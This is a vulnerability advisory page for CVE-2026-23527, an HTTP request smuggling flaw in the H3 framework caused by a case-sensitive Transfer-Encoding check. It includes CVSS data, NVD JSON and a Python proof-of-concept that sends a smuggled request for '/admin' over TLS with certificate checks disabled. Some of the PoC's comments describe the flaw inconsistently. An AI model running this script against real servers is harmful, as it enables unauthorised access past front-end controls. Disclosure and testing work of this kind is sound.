Security Vulnerability Report
中文
CVE-2026-23527 CVSS 8.9 HIGH

CVE-2026-23527

Published: 2026-01-15 20:16:06
Last Modified: 2026-04-13 17:16:28
Source: [email protected]

Description

H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for "chunked", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5.

CVSS Details

CVSS Score
8.9
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:h3:h3:*:*:*:*:*:node.js:*:* - VULNERABLE
H3 < 1.15.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-23527 PoC - H3 HTTP Request Smuggling Note: This PoC demonstrates the vulnerability for educational purposes only. """ import socket import ssl def send_raw_request(host, port, request): """Send raw HTTP request and return response""" context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE with socket.create_connection((host, port)) as sock: with context.wrap_socket(sock, server_hostname=host) as ssock: ssock.sendall(request.encode('utf-8')) response = ssock.recv(4096) return response.decode('utf-8', errors='ignore') def exploit_request_smuggling(host, port): """ HTTP Request Smuggling exploit using case-insensitive Transfer-Encoding bypass The server should reject 'chunked' with uppercase, but vulnerable versions accept it. """ # Malicious request with uppercase 'CHUNKED' to bypass case-sensitive check malicious_request = ( "POST / HTTP/1.1\r\n" "Host: {}\r\n" "Transfer-Encoding: CHUNKED\r\n" # Uppercase to bypass vulnerable check "Content-Length: 50\r\n" "\r\n" "0\r\n" "\r\n" "GET /admin HTTP/1.1\r\n" "Host: {}\r\n" "\r\n" ).format(host, host) print(f"[*] Sending malicious request to {host}:{port}") print(f"[*] Request contains 'CHUNKED' (uppercase) to bypass case-sensitive check") response = send_raw_request(host, port, malicious_request) print(f"[*] Response received:\n{response}") return response if __name__ == "__main__": TARGET_HOST = "vulnerable-server.example.com" TARGET_PORT = 443 print("=" * 60) print("CVE-2026-23527 - H3 HTTP Request Smuggling PoC") print("=" * 60) try: exploit_request_smuggling(TARGET_HOST, TARGET_PORT) except Exception as e: print(f"[!] Error: {e}") print("[*] Make sure to test against a vulnerable H3 server version < 1.15.5")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23527", "sourceIdentifier": "[email protected]", "published": "2026-01-15T20:16:05.620", "lastModified": "2026-04-13T17:16:27.900", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for \"chunked\", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5."}, {"lang": "es", "value": "H3 es un framework H(TTP) mínimo diseñado para alto rendimiento y portabilidad. Antes de 1.15.5, existe una vulnerabilidad crítica de contrabando de solicitudes HTTP. readRawBody realiza una comprobación estricta sensible a mayúsculas y minúsculas para el encabezado Transfer-Encoding. Busca explícitamente 'chunked', pero según la RFC, este encabezado debería ser insensible a mayúsculas y minúsculas. Esta vulnerabilidad está corregida en 1.15.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.15.5", "matchCriteriaId": "8AEE0C29-3BA5-4765-82CB-0CE73ACCEB77"}]}]}], "references": [{"url": "https://github.com/h3js/h3/commit/618ccf4f37b8b6148bea7f36040471af45bfb097", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/h3js/h3/releases/tag/v1.15.5", "source": "[email protected]"}, {"url": "https://github.com/h3js/h3/security/advisories/GHSA-mp2g-9vg9-f4cg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://simonkoeck.com/writeups/h3-transfer-encoding-request-smuggling", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.